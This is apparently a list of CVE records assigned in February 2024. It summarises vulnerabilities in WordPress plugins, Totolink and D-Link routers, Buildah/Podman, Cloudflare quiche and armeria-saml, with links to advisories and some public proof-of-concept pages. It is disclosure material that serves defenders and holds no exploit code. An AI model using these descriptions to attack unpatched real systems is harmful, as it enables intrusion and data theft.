URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/fff8dfbc-fd59-47db-85bb-de2a7c6a9a5f?source=cve    Assigned (20240222)
CVE    2024    1793    Candidate    The AWeber – Free Sign Up Form and Landing Page Builder Plugin for Lead Generation and Email Newsletter Growth plugin for WordPress is vulnerable to SQL Injection via the 'post_id' parameter in all versions up to, and including, 7.3.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.    MISC:https://glimmer-handball-dae.notion.site/AWeber-Authenticated-SQLi-Admin-6e0d31c4a14c42f4996f9e201482d4cc?pvs=4   |   URL:https://glimmer-handball-dae.notion.site/AWeber-Authenticated-SQLi-Admin-6e0d31c4a14c42f4996f9e201482d4cc?pvs=4   |   MISC:https://plugins.trac.wordpress.org/browser/aweber-web-form-widget/tags/7.3.12/php/aweber_webform_plugin.php#L962   |   URL:https://plugins.trac.wordpress.org/browser/aweber-web-form-widget/tags/7.3.12/php/aweber_webform_plugin.php#L962   |   MISC:https://plugins.trac.wordpress.org/browser/aweber-web-form-widget/tags/7.3.12/php/aweber_webform_plugin.php#L970   |   URL:https://plugins.trac.wordpress.org/browser/aweber-web-form-widget/tags/7.3.12/php/aweber_webform_plugin.php#L970   |   MISC:https://plugins.trac.wordpress.org/browser/aweber-web-form-widget/tags/7.3.12/php/aweber_webform_plugin.php#L972   |   URL:https://plugins.trac.wordpress.org/browser/aweber-web-form-widget/tags/7.3.12/php/aweber_webform_plugin.php#L972   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042751%40aweber-web-form-widget&new=3042751%40aweber-web-form-widget&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042751%40aweber-web-form-widget&new=3042751%40aweber-web-form-widget&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f3ae3bca-d363-4c4b-809f-0625385bc9a6?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f3ae3bca-d363-4c4b-809f-0625385bc9a6?source=cve    Assigned (20240222)
CVE    2024    1791    Candidate    The CodeMirror Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Code Mirror block in all versions up to, and including, 1.2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://wordpress.org/plugins/wp-codemirror-block/   |   URL:https://wordpress.org/plugins/wp-codemirror-block/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/52569aac-1e9e-40fb-9ff4-5eeb7940375d?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/52569aac-1e9e-40fb-9ff4-5eeb7940375d?source=cve    Assigned (20240222)
CVE    2024    1788    Candidate    ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2023-2813. Reason: This candidate is a duplicate of CVE-2023-2813. Notes: All CVE users should reference CVE-2023-2813 instead of this candidate.        Assigned (20240222)
CVE    2024    1787    Candidate    The Contests by Rewards Fuel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'update_rewards_fuel_api_key' parameter in all versions up to, and including, 2.0.64 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3051990%40contests-from-rewards-fuel&new=3051990%40contests-from-rewards-fuel&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3051990%40contests-from-rewards-fuel&new=3051990%40contests-from-rewards-fuel&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/9eeec949-e440-4df3-8c26-db92498cada3?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/9eeec949-e440-4df3-8c26-db92498cada3?source=cve    Assigned (20240222)
CVE    2024    1786    Candidate    ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in D-Link DIR-600M C1 3.08. Affected by this issue is some unknown functionality of the component Telnet Service. The manipulation of the argument username leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254576. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.    MISC:VDB-254576 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.254576   |   MISC:VDB-254576 | D-Link DIR-600M C1 Telnet Service buffer overflow   |   URL:https://vuldb.com/?id.254576   |   MISC:https://gist.github.com/dmknght/269d90e17713bbd34e48c50f5c5284a2   |   URL:https://gist.github.com/dmknght/269d90e17713bbd34e48c50f5c5284a2    Assigned (20240222)
CVE    2024    1785    Candidate    The Contests by Rewards Fuel plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.62. This is due to missing or incorrect nonce validation on the ajax_handler() function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious JavaScript via a forged request granted they can trick a site's user with the edit_posts capability into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3039978%40contests-from-rewards-fuel&new=3039978%40contests-from-rewards-fuel&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3039978%40contests-from-rewards-fuel&new=3039978%40contests-from-rewards-fuel&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/689f3667-2dda-40a8-8627-d38c6c6816fc?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/689f3667-2dda-40a8-8627-d38c6c6816fc?source=cve    Assigned (20240222)
CVE    2024    1784    Candidate    A vulnerability classified as problematic was found in Limbas 5.2.14. Affected by this vulnerability is an unknown functionality of the file main_admin.php. The manipulation of the argument tab_group leads to sql injection. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254575. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-254575 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254575   |   MISC:VDB-254575 | Limbas main_admin.php sql injection   |   URL:https://vuldb.com/?id.254575   |   MISC:https://github.com/liyako/vulnerability/blob/main/POC/Limbas-Blind-SQL-injection.md   |   URL:https://github.com/liyako/vulnerability/blob/main/POC/Limbas-Blind-SQL-injection.md    Assigned (20240222)
CVE    2024    1783    Candidate    A vulnerability classified as critical has been found in Totolink LR1200GB 9.1.0u.6619_B20230130/9.3.5u.6698_B20230810. Affected is the function loginAuth of the file /cgi-bin/cstecgi.cgi of the component Web Interface. The manipulation of the argument http_host leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-254574 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-254574 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.254574   |   MISC:VDB-254574 | Totolink LR1200GB Web Interface cstecgi.cgi loginAuth stack-based overflow   |   URL:https://vuldb.com/?id.254574   |   MISC:https://gist.github.com/manishkumarr1017/30bca574e2f0a6d6336115ba71111984   |   URL:https://gist.github.com/manishkumarr1017/30bca574e2f0a6d6336115ba71111984    Assigned (20240222)
CVE    2024    1782    Candidate    The Blue Triad EZAnalytics plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'bt_webid' parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/browser/blue-triad-ezanalytics/trunk/blue-triad-ezanalytics.php   |   URL:https://plugins.trac.wordpress.org/browser/blue-triad-ezanalytics/trunk/blue-triad-ezanalytics.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0cae2bb8-33e7-47b0-861d-b976a67660ae?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0cae2bb8-33e7-47b0-861d-b976a67660ae?source=cve    Assigned (20240222)
CVE    2024    1781    Candidate    A vulnerability was found in Totolink X6000R AX3000 9.4.0cu.852_20230719. It has been rated as critical. This issue affects the function setWizardCfg of the file /cgi-bin/cstecgi.cgi of the component shttpd. The manipulation leads to command injection. The exploit has been disclosed to the public and may be used. The identifier VDB-254573 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-254573 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254573   |   MISC:VDB-254573 | Totolink X6000R AX3000 shttpd cstecgi.cgi setWizardCfg command injection   |   URL:https://vuldb.com/?id.254573   |   MISC:https://github.com/Icycu123/X6000R-AX3000-Wifi-6-Giga/blob/main/2/X6000R%20AX3000%20WiFi%206%20Giga%E7%84%A1%E7%B7%9A%E8%B7%AF%E7%94%B1%E5%99%A8%E6%9C%AA%E6%8E%88%E6%9D%83rce.md   |   URL:https://github.com/Icycu123/X6000R-AX3000-Wifi-6-Giga/blob/main/2/X6000R%20AX3000%20WiFi%206%20Giga%E7%84%A1%E7%B7%9A%E8%B7%AF%E7%94%B1%E5%99%A8%E6%9C%AA%E6%8E%88%E6%9D%83rce.md    Assigned (20240222)
CVE    2024    1779    Candidate    The Admin side data storage for Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the zt_dcfcf_change_status() function in all versions up to, and including, 1.1.1. This makes it possible for unauthenticated attackers to alter the message read status of messages.    MISC:https://plugins.trac.wordpress.org/browser/admin-side-data-storage-for-contact-form-7/trunk/inc/admin/class.ztdcfcf.admin.action.php#L213   |   URL:https://plugins.trac.wordpress.org/browser/admin-side-data-storage-for-contact-form-7/trunk/inc/admin/class.ztdcfcf.admin.action.php#L213   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/52e4f79f-1148-4530-8d78-377a7365978a?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/52e4f79f-1148-4530-8d78-377a7365978a?source=cve    Assigned (20240222)
CVE    2024    1778    Candidate    The Admin side data storage for Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the zt_dcfcf_change_bookmark() function in all versions up to, and including, 1.1.1. This makes it possible for unauthenticated attackers to alter bookmark statuses.    MISC:https://plugins.trac.wordpress.org/browser/admin-side-data-storage-for-contact-form-7/trunk/inc/admin/class.ztdcfcf.admin.action.php#L235   |   URL:https://plugins.trac.wordpress.org/browser/admin-side-data-storage-for-contact-form-7/trunk/inc/admin/class.ztdcfcf.admin.action.php#L235   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d74040d0-1fee-4906-af6f-a5d842c42fd4?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d74040d0-1fee-4906-af6f-a5d842c42fd4?source=cve    Assigned (20240222)
CVE    2024    1777    Candidate    The Admin side data storage for Contact Form 7 plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.1. This is due to missing or incorrect nonce validation on the settings update function. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/browser/admin-side-data-storage-for-contact-form-7/trunk/inc/admin/inc/settings.php#L301   |   URL:https://plugins.trac.wordpress.org/browser/admin-side-data-storage-for-contact-form-7/trunk/inc/admin/inc/settings.php#L301   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b411a97b-2f1c-4feb-b1c7-bc5a1aab7f33?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b411a97b-2f1c-4feb-b1c7-bc5a1aab7f33?source=cve    Assigned (20240222)
CVE    2024    1776    Candidate    The Admin side data storage for Contact Form 7 plugin for WordPress is vulnerable to SQL Injection via the 'form-id' parameter in all versions up to, and including, 1.1.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.    MISC:https://plugins.trac.wordpress.org/browser/admin-side-data-storage-for-contact-form-7/trunk/inc/admin/inc/settings.php#L301   |   URL:https://plugins.trac.wordpress.org/browser/admin-side-data-storage-for-contact-form-7/trunk/inc/admin/inc/settings.php#L301   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7bff8172-b879-40b0-a229-a54787baa38a?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7bff8172-b879-40b0-a229-a54787baa38a?source=cve    Assigned (20240222)
CVE    2024    1775    Candidate    The Nextend Social Login and Register plugin for WordPress is vulnerable to a self-based Reflected Cross-Site Scripting via the ‘error_description’ parameter in all versions up to, and including, 3.1.12 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers, with access to a subscriber-level account, to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. NOTE: This vulnerability can be successfully exploited on a vulnerable WordPress instance against an OAuth pre-authenticated higher-level user (e.g., administrator) by leveraging a cross-site request forgery in conjunction with a certain social engineering technique to achieve a critical impact scenario (cross-site scripting to administrator-level account creation). However, successful exploitation requires "Debug mode" to be enabled in the plugin's "Global Settings".    MISC:https://plugins.trac.wordpress.org/changeset/3042326/nextend-facebook-connect   |   URL:https://plugins.trac.wordpress.org/changeset/3042326/nextend-facebook-connect   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/3bad1d0d-3817-4c7f-a012-5a85b577781e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/3bad1d0d-3817-4c7f-a012-5a85b577781e?source=cve    Assigned (20240222)
CVE    2024    1773    Candidate    The PDF Invoices and Packing Slips For WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3.7 via deserialization of untrusted input via the order_id parameter. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.    MISC:https://plugins.trac.wordpress.org/browser/pdf-invoices-and-packing-slips-for-woocommerce/trunk/includes/class-apifw-front-end.php#L94   |   URL:https://plugins.trac.wordpress.org/browser/pdf-invoices-and-packing-slips-for-woocommerce/trunk/includes/class-apifw-front-end.php#L94   |   MISC:https://plugins.trac.wordpress.org/changeset/3042740/   |   URL:https://plugins.trac.wordpress.org/changeset/3042740/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/4dc6e879-4ccf-485e-b02d-2b291e67df40?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/4dc6e879-4ccf-485e-b02d-2b291e67df40?source=cve    Assigned (20240222)
CVE    2024    1772    Candidate    The Play.ht – Make Your Blog Posts Accessible With Text to Speech Audio plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.6.4 via deserialization of untrusted input from the play_podcast_data post meta. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.    MISC:https://plugins.trac.wordpress.org/browser/play-ht/trunk/includes/class-ajax-handler.php#L138   |   URL:https://plugins.trac.wordpress.org/browser/play-ht/trunk/includes/class-ajax-handler.php#L138   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/83a595b7-379c-4202-abdd-d8ba4a30c6a4?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/83a595b7-379c-4202-abdd-d8ba4a30c6a4?source=cve    Assigned (20240222)
CVE    2024    1771    Candidate    The Total theme for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the total_order_sections() function in all versions up to, and including, 2.1.59. This makes it possible for authenticated attackers, with subscriber-level access and above, to repeat sections on the homepage.    MISC:https://themes.trac.wordpress.org/browser/total/2.1.59/inc/customizer/customizer-functions.php#L112   |   URL:https://themes.trac.wordpress.org/browser/total/2.1.59/inc/customizer/customizer-functions.php#L112   |   MISC:https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=219020%40total%2F2.1.60&old=216973%40total%2F2.1.59   |   URL:https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=219020%40total%2F2.1.60&old=216973%40total%2F2.1.59   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/26b64ae3-5839-47d5-9c65-7c595bb18e6c?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/26b64ae3-5839-47d5-9c65-7c595bb18e6c?source=cve    Assigned (20240222)
CVE    2024    1769    Candidate    The JM Twitter Cards plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 12 via the meta description data. This makes it possible for unauthenticated attackers to view password protected post content when viewing the page source.    MISC:https://wordpress.org/plugins/jm-twitter-cards/   |   URL:https://wordpress.org/plugins/jm-twitter-cards/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b48e5973-6923-47cc-a660-ecc989f540f8?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b48e5973-6923-47cc-a660-ecc989f540f8?source=cve    Assigned (20240222)
CVE    2024    1767    Candidate    The Blocksy theme for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's blocks in all versions up to, and including, 2.0.26 due to insufficient input sanitization and output escaping on user supplied attributes like 'className' and 'radius'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=219324%40blocksy&new=219324%40blocksy&sfp_email=&sfph_mail=   |   URL:https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=219324%40blocksy&new=219324%40blocksy&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/fdeab668-9094-485f-aa01-13ba5c10ea89?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/fdeab668-9094-485f-aa01-13ba5c10ea89?source=cve    Assigned (20240222)
CVE    2024    1765    Candidate    Cloudflare Quiche (through version 0.19.1/0.20.0) was affected by an unlimited resource allocation vulnerability causing rapid increase of memory usage of the system running quiche server or client. A remote attacker could take advantage of this vulnerability by repeatedly sending an unlimited number of 1-RTT CRYPTO frames after previously completing the QUIC handshake. Exploitation was possible for the duration of the connection which could be extended by the attacker. quiche 0.19.2 and 0.20.1 are the earliest versions containing the fix for this issue.    MISC:https://github.com/cloudflare/quiche/security/advisories/GHSA-78wx-jg4j-5j6g   |   URL:https://github.com/cloudflare/quiche/security/advisories/GHSA-78wx-jg4j-5j6g    Assigned (20240222)
CVE    2024    1764    Candidate    Improper privilege management in the Just-in-time (JIT) elevation module in Devolutions Server 2023.3.14.0 and earlier allows a user to continue using the elevated privilege even after the expiration under specific circumstances.    MISC:https://devolutions.net/security/advisories/DEVO-2024-0002   |   URL:https://devolutions.net/security/advisories/DEVO-2024-0002    Assigned (20240222)
CVE    2024    1763    Candidate    The Wp Social Login and Register Social Counter plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the /wp_social/v1/ REST API endpoint in all versions up to, and including, 3.0.0. This makes it possible for unauthenticated attackers to enable and disable certain providers for the social share and login features.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042283%40wp-social&new=3042283%40wp-social&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042283%40wp-social&new=3042283%40wp-social&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/4f145c85-f3c6-46a7-b8ae-d486dd23087d?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/4f145c85-f3c6-46a7-b8ae-d486dd23087d?source=cve    Assigned (20240222)
CVE    2024    1761    Candidate    The WP Chat App plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widget/block in all versions up to, and including, 3.6.1 due to insufficient input sanitization and output escaping on user supplied attributes such as 'buttonColor' and 'phoneNumber'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3044368%40wp-whatsapp%2Ftrunk&old=3029885%40wp-whatsapp%2Ftrunk&sfp_email=&sfph_mail=#file4   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3044368%40wp-whatsapp%2Ftrunk&old=3029885%40wp-whatsapp%2Ftrunk&sfp_email=&sfph_mail=#file4   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/85a94f32-e1e5-48ea-822e-c54d0592da28?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/85a94f32-e1e5-48ea-822e-c54d0592da28?source=cve    Assigned (20240222)
CVE    2024    1760    Candidate    The Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.6.6.20. This is due to missing or incorrect nonce validation on the ssa_factory_reset() function. This makes it possible for unauthenticated attackers to reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/trunk/includes/class-support.php#L527   |   URL:https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/trunk/includes/class-support.php#L527   |   MISC:https://plugins.trac.wordpress.org/changeset/3042890/simply-schedule-appointments/trunk/includes/class-support.php   |   URL:https://plugins.trac.wordpress.org/changeset/3042890/simply-schedule-appointments/trunk/includes/class-support.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0eec9744-6dbd-42bd-b9c5-c9d792cecf4b?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0eec9744-6dbd-42bd-b9c5-c9d792cecf4b?source=cve    Assigned (20240222)
CVE    2024    1758    Candidate    The SuperFaktura WooCommerce plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.40.3 via the wc_sf_url_check function. This makes it possible for authenticated attackers, with subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.    MISC:https://plugins.trac.wordpress.org/browser/woocommerce-superfaktura/trunk/class-wc-superfaktura.php#L3418   |   URL:https://plugins.trac.wordpress.org/browser/woocommerce-superfaktura/trunk/class-wc-superfaktura.php#L3418   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040372%40woocommerce-superfaktura&new=3040372%40woocommerce-superfaktura&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040372%40woocommerce-superfaktura&new=3040372%40woocommerce-superfaktura&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/520598d7-863f-4bf3-ba74-fa9b2cc32767?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/520598d7-863f-4bf3-ba74-fa9b2cc32767?source=cve    Assigned (20240222)
CVE    2024    1753    Candidate    A flaw was found in Buildah (and subsequently Podman Build) which allows containers to mount arbitrary locations on the host filesystem into build containers. A malicious Containerfile can use a dummy image with a symbolic link to the root filesystem as a mount source and cause the mount operation to mount the host root filesystem inside the RUN step. The commands inside the RUN step will then have read-write access to the host filesystem, allowing for full container escape at build time.    MISC:RHBZ#2265513   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2265513   |   MISC:https://access.redhat.com/security/cve/CVE-2024-1753   |   URL:https://access.redhat.com/security/cve/CVE-2024-1753   |   MISC:https://github.com/containers/buildah/security/advisories/GHSA-pmf3-c36m-g5cf   |   URL:https://github.com/containers/buildah/security/advisories/GHSA-pmf3-c36m-g5cf   |   MISC:https://github.com/containers/podman/security/advisories/GHSA-874v-pj72-92f3   |   URL:https://github.com/containers/podman/security/advisories/GHSA-874v-pj72-92f3    Assigned (20240222)
CVE    2024    1751    Candidate    The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to time-based SQL Injection via the question_id parameter in all versions up to, and including, 2.6.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber/student access or higher, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.    MISC:https://plugins.trac.wordpress.org/browser/tutor/tags/2.6.1/classes/Utils.php#L4555   |   URL:https://plugins.trac.wordpress.org/browser/tutor/tags/2.6.1/classes/Utils.php#L4555   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3049105%40tutor&new=3049105%40tutor&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3049105%40tutor&new=3049105%40tutor&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f9cee379-79f8-4a60-b1bb-ccab1e954512?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f9cee379-79f8-4a60-b1bb-ccab1e954512?source=cve    Assigned (20240222)
CVE    2024    1750    Candidate    A vulnerability, which was classified as critical, was found in TemmokuMVC up to 2.3. Affected is the function get_img_url/img_replace in the library lib/images_get_down.php of the component Image Download Handler. The manipulation leads to deserialization. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254532. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-254532 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.254532   |   MISC:VDB-254532 | TemmokuMVC Image Download images_get_down.php img_replace deserialization   |   URL:https://vuldb.com/?id.254532   |   MISC:https://note.zhaoj.in/share/OrBH8zLKUPOA   |   URL:https://note.zhaoj.in/share/OrBH8zLKUPOA    Assigned (20240222)
CVE    2024    1749    Candidate    A vulnerability, which was classified as problematic, has been found in Bdtask Bhojon Best Restaurant Management Software 2.9. This issue affects some unknown processing of the file /dashboard/message of the component Message Page. The manipulation of the argument Title leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254531. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-254531 | Bdtask Bhojon Best Restaurant Management Software Message Page message cross site scripting   |   URL:https://vuldb.com/?id.254531   |   MISC:VDB-254531 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.254531   |   MISC:https://drive.google.com/file/d/1oM1h3E9G17lgkbSnhq7FQjfAtEojDNFo/view?usp=sharing   |   URL:https://drive.google.com/file/d/1oM1h3E9G17lgkbSnhq7FQjfAtEojDNFo/view?usp=sharing    Assigned (20240222)
CVE    2024    1748    Candidate    A vulnerability classified as critical was found in van_der_Schaar LAB AutoPrognosis 0.1.21. This vulnerability affects the function load_model_from_file of the component Release Note Handler. The manipulation leads to deserialization. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. VDB-254530 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-254530 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.254530   |   MISC:VDB-254530 | van_der_Schaar LAB AutoPrognosis Release Note load_model_from_file deserialization   |   URL:https://vuldb.com/?id.254530   |   MISC:https://github.com/bayuncao/vul-cve-13   |   URL:https://github.com/bayuncao/vul-cve-13    Assigned (20240222)
CVE    2024    1745    Candidate    The Testimonial Slider WordPress plugin before 2.3.7 does not properly ensure that a user has the necessary capabilities to edit certain sensitive plugin settings, making it possible for users with at least the Author role to edit them.    MISC:https://wpscan.com/vulnerability/b63bbfeb-d6f7-4c33-8824-b86d64d3f598/   |   URL:https://wpscan.com/vulnerability/b63bbfeb-d6f7-4c33-8824-b86d64d3f598/    Assigned (20240222)
CVE    2024    1742    Candidate    Invocation of the sqlplus command with sensitive information in the command line in the mk_oracle Checkmk agent plugin before Checkmk 2.3.0b4 (beta), 2.2.0p24, 2.1.0p41 and 2.0.0 (EOL) allows the extraction of this information from the process list.    MISC:https://checkmk.com/werk/16234   |   URL:https://checkmk.com/werk/16234    Assigned (20240222)
CVE    2024    1735    Candidate    A vulnerability has been identified in armeria-saml versions less than 1.27.2, allowing the use of malicious SAML messages to bypass authentication. All users who rely on armeria-saml older than version 1.27.2 must upgrade to 1.27.2 or later.    MISC:https://github.com/line/armeria/security/advisories/GHSA-4m6j-23p2-8c54   |   URL:https://github.com/line/armeria/security/advisories/GHSA-4m6j-23p2-8c54    Assigned (20240222)
